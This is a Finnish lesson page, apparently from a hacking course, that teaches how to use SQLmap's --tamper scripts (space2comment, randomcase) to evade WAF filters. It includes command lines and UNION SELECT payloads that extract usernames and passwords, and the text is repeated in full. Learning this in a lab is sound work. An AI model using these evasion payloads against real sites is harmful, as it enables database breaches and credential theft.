Monet sivustot suojaavat itseään SQL-injektiolta käyttämällä WAF:eja (Web Application Firewall) tai muita suodattimia. Ne estävät suoria hyökkäyksiä, mutta usein hyvin yksinkertaisella logiikalla (estävät esimerkiksi sanan 

). SQLmapin --tamper-toiminto auttaa kiertämään nämä suojaukset.

--tamper-skriptit muokkaavat SQLmapin lähettämiä pyyntöjä niin, että ne näyttävät erilaisilta, mutta toimivat silti.

Esim. space2comment korvaa välilyönnit SQL-kommenteilla (/**/).

randomcase kirjoittaa komennot satunnaisella kirjainkoolla (UnIoN SeLeCt).

charunicodeencode muuttaa merkit Unicode-muotoon.

Case 1: WAF estää UNION SELECT -komennon

Ilman tamper-komentoa SQLmap voisi yrittää esimerkiksi seuraavanlaista injektiota:

SQLmap muuttaa UNION SELECT → UNION/**/SELECT, jolloin WAF ei tunnista hyökkäystä.

Jos WAF estää sanat “SELECT” ja “UNION”, mutta ei huomioi kirjainkokoa:

Komennot voivat mennä läpi muodossa “sElEcT” tai “UnIoN”.

Joskus yksi ei riitä. Voit käyttää useita scriptejä erottamalla ne pilkulla:

--tamper auttaa kiertämään yksinkertaisia suodattimia

Useiden tamper-skriptien yhdistely voi avata lukittuja ovia

Seuraaksi pääset kokeilemaan tamper scriptien käyttöä harjoitusympäristössä. Labrassa näkyy taustalla käytetty SQL lauseke, josta voi olla apua injektion ja tamperin valinnassa.

Tässä labrassa pääset harjoittelemaan --tamper vivun käyttöä Sqlmapissa.

MySQL Sqlmap ja tamper

Monet sivustot suojaavat itseään SQL-injektiolta käyttämällä WAF:eja (Web Application Firewall) tai muita suodattimia. Ne estävät suoria hyökkäyksiä, mutta usein hyvin yksinkertaisella logiikalla (estävät esimerkiksi sanan *UNION*). SQLmapin --tamper-toiminto auttaa kiertämään nämä suojaukset.

## Miten --tamper toimii?

--tamper-skriptit muokkaavat SQLmapin lähettämiä pyyntöjä niin, että ne näyttävät erilaisilta, mutta toimivat silti.

- Esim. space2comment korvaa välilyönnit SQL-kommenteilla (/\*\*/).
- randomcase kirjoittaa komennot satunnaisella kirjainkoolla (UnIoN SeLeCt).
- charunicodeencode muuttaa merkit Unicode-muotoon.

---

## Esimerkkitapaukset

### Case 1: WAF estää UNION SELECT -komennon

Ilman tamper-komentoa SQLmap voisi yrittää esimerkiksi seuraavanlaista injektiota:

```sh
sqlmap -u "http://sivu.fi/hae.php?id=1"

-> http://sivu.fi/hae.php?id=1 UNION SELECT user,pass FROM users
```

WAF blokkaa pyynnön heti.

space2comment tamperilla:

```sh
sqlmap -u "http://sivu.fi/hae.php?id=1" --tamper=space2comment

-> http://sivu.fi/hae.php?id=1/**/UNION/**/SELECT/**/user,pass/**/FROM/**/users
```

SQLmap muuttaa UNION SELECT → UNION/\*\*/SELECT, jolloin WAF ei tunnista hyökkäystä.

### Case 2: WAF tarkistaa kirjainkoon

Jos WAF estää sanat “SELECT” ja “UNION”, mutta ei huomioi kirjainkokoa:

```sh
sqlmap -u "http://sivu.fi/hae.php?id=1" --tamper=randomcase

-> http://sivu.fi/hae.php?id=1 UnIoN sElEcT user,pass FROM users
```

Komennot voivat mennä läpi muodossa “sElEcT” tai “UnIoN”.

### Case 3: Useiden tamperien yhdistäminen

Joskus yksi ei riitä. Voit käyttää useita scriptejä erottamalla ne pilkulla:

```sh
sqlmap -u "http://sivu.fi/hae.php?id=1" --tamper=space2comment,randomcase

-> http://sivu.fi/hae.php?id=1/**/UnIoN/**/sElEcT/**/user,pass/**/FROM/**/users
```

---

## Yhteenveto

- --tamper auttaa kiertämään yksinkertaisia suodattimia
- Toimii erityisen hyvin WAF:ia vastaan
- Useiden tamper-skriptien yhdistely voi avata lukittuja ovia

Seuraaksi pääset kokeilemaan tamper scriptien käyttöä harjoitusympäristössä. Labrassa näkyy taustalla käytetty SQL lauseke, josta voi olla apua injektion ja tamperin valinnassa.

@exercise f8db64de00b4


SQLmap ja tamper

SQL-injektio lienee syynä valtaosaan vakavista tietomurroista, pääasiallisesti sen takia että haavoittuvuus on suuressa sovelluksessa erittäin todennäköinen jos teknologiavalinnat ovat huonot, ja seuraus on yleensä koko tietokannan vuotaminen hyökkääjälle.

Perusteet haltuun

Mitä ovat SQL-injektiot?

Intro

SQLmap ja tamper

Miten --tamper toimii?

Hakkeroinnin oppiminen alkaa tästä